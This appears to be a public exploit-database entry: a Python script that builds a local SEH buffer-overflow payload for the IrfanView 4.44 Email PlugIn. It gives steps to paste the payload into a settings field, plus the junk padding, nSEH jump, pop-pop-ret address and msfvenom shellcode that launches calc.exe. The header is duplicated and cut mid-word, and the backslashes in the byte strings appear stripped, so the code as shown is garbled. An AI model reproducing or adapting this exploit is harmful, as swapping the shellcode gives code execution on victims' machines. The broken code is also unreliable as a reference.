IrfanView 4.44 SEH Buffer Overflow

#!/usr/bin/python

#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: IrfanView 4.44 Email PlugIn - Local Buffer Overflow (SEH)
# Date: 02-07-2018
# Vu #!/usr/bin/python

#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: IrfanView 4.44 Email PlugIn - Local Buffer Overflow (SEH)
# Date: 02-07-2018
# Vulnerable Software: IrfanView 4.44 Email PlugIn
# Vendor Homepage: http://www.irfanview.com/
# Version: 4.44
# Software Link: http://www.irfanview.info/files/irfanview_444.exe
# Software Link: http://www.irfanview.info/files/irfanview_plugins_444.zip
# Tested On: Windows XP SP3 x86 and Windows 7 SP1 x86
#
# PoC
# 1. generate irfan.txt, copy contents to clipboard
# 2. open IrfanView and a sample image from My Pictures (i.e. Chrysanthemum.jpg)
# 3. select Options, Send by Email, Settings
# 4. paste contents from clipboard into Full Name and select OK
# 5. application crashes
# 6. pop calc
#

filename="irfan.txt"

junk = "x41"*1236

#jump 6
nseh = "xebx06x90x90"

#0x10021420 : pop ebp # pop ebx # ret
seh = "x20x14x02x10"

#msfvenom -p windows/exec CMD=calc.exe -b "x00x0ax0d" -f c
#Payload size: 220 bytes
calc = (
"xdaxdfxbax32x98xc1x8exd9x74x24xf4x58x31xc9xb1"
"x31x83xe8xfcx31x50x14x03x50x26x7ax34x72xaexf8"
"xb7x8bx2ex9dx3ex6ex1fx9dx25xfax0fx2dx2dxaexa3"
"xc6x63x5bx30xaaxabx6cxf1x01x8ax43x02x39xeexc2"
"x80x40x23x25xb9x8ax36x24xfexf7xbbx74x57x73x69"
"x69xdcxc9xb2x02xaexdcxb2xf7x66xdex93xa9xfdxb9"
"x33x4bxd2xb1x7dx53x37xffx34xe8x83x8bxc6x38xda"
"x74x64x05xd3x86x74x41xd3x78x03xbbx20x04x14x78"
"x5bxd2x91x9bxfbx91x02x40xfax76xd4x03xf0x33x92"
"x4cx14xc5x77xe7x20x4ex76x28xa1x14x5dxecxeaxcf"
"xfcxb5x56xa1x01xa5x39x1exa4xadxd7x4bxd5xefxbd"
"x8ax6bx8axf3x8dx73x95xa3xe5x42x1ex2cx71x5bxf5"
"x09x8dx11x54x3bx06xfcx0cx7ex4bxffxfaxbcx72x7c"
"x0fx3cx81x9cx7ax39xcdx1ax96x33x5excfx98xe0x5f"
"xdaxfax67xccx86xd2x02x74x2cx2b")

fill = "x44"*1000

buffer = junk + nseh + seh + calc + fill

textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()